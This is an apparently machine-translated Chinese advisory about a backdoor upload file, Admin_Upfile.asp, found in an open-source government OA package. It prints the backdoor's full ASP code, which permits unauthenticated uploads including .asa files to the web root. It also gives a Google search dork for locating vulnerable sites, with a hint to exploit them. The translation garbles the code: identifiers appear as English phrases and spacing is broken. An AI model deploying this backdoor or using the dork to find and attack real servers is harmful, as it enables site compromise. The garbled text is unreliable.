Xia Mao government integrated OA full open source version of the built-in Backdoor-vulnerability warning-the black bar safety net

2012-05-19T00:00:00
ID MYHACK58:62201233912
Type myhack58
Reporter 佚名
Modified 2012-05-19T00:00:00

Description

The source code to download address http://www.mycodes.net/25/2177.htm

Back door file: HXINCLUDE/Admin_Upfile. asp

<%Response. Buffer=TrueServer. ScriptTimeOut=9999999OnErrorResumeNext%><! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><metahttp-equiv="Content-Type"content="text/html; charset=gb2312"/><metahttp-equiv="Content-Language"content="zh-cn"/><metacontent="all"name="robots"/>< metaname="author"content="file upload"/><metaname="description"content="file upload"/><metaname="keywords"content="file upload"/><styletype="text/css"><!-- body,input {font-size:12px;}--></style><title>file upload script</title></head><bodyid="body"><%ExtName="jpg,gif,txt,asa" 'allow extension to develop this program specifically = "/" 'save path If Right(develop this program specifically,1)<>"/" Then develop this program specifically=develop this program specifically&"/" 'in the directory after the(/) CheckAndCreateFolder(develop this program specifically) UpLoadAll_a = Request. TotalBytes 'to obtain the client the full content If(UpLoadAll_a>0) Then Set UploadStream_c = Server. CreateObject("ADODB. Stream") UploadStream_c. Type = 1 UploadStream_c. Open UploadStream_c. The Write Request. BinaryRead(UpLoadAll_a) UploadStream_c. Position = 0 FormDataAll_d = UploadStream_c. Read CrLf_e = chrB(1 3)&chrB(1 0) FormStart_f = InStrB(FormDataAll_d,CrLf_e) FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e) Set FormStream_h = Server. Createobject("ADODB. Stream") FormStream_h. Type = 1 FormStream_h. Open UploadStream_c. Position = FormStart_f + 1 UploadStream_c. CopyTo FormStream_h,FormEnd_g-FormStart_f-3 FormStream_h. Position = 0 FormStream_h. Type = 2 FormStream_h. CharSet = "GB2312" FormStreamText_i = FormStream_h. Readtext FormStream_h. Close FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)If(CheckFileExt(FileName_j,ExtName))ThenSaveFile=Server. MapPath(develop this program specifically&FileName_j)IfErrThenResponse. Write"file uploaded: <span style=""color:red;"">file upload error!& lt;/span> <a href="""&Request. ServerVariables("URL")&""">re-upload the file</a>"Err. ClearElseSaveFile=CheckFileExists(SaveFile) k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4 l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2FormStream_h. Type=1FormStream_h. OpenUploadStream_c. Position=k-1UploadStream_c. CopyToFormStream_h,l FormStream_h. SaveToFileSaveFile,2SaveFileName=Mid(SaveFile,InstrRev(SaveFile,"\")+1) Response. write "file uploaded:<span style=""color:red;"">" & amp; SaveFileName & "</span>file uploaded successfully! <a href=""" & Request. ServerVariables("URL") &""">continue to upload the file</a>" End If Else Response. write "file uploaded:<span style=""color:red;"">File format is not valid!& lt;/span> <a href=""" & Request. ServerVariables("URL") &""">re-upload the file</a>" End If Else%><scriptlanguage="Javascript"><!-- functionValidInput(){if(document. upform. upfile. value==""){ alert("please select Upload File!") document. upform. upfile. focus()returnfalse}returntrue}// --></script><form action='<%=Request. ServerVariables("URL") %>' method='post' name="upform" onsubmit="return ValidInput()" enctype="multipart/form-data">file to upload:<inputtype='file'name='upfile'size="4 0"><inputtype='submit'value="upload"></form><%EndifSetFormStream_h=NothingUploadStream. CloseSetUploadStream=Nothing%></body></html>

Using the method you know

Google inurl:a125_news. asp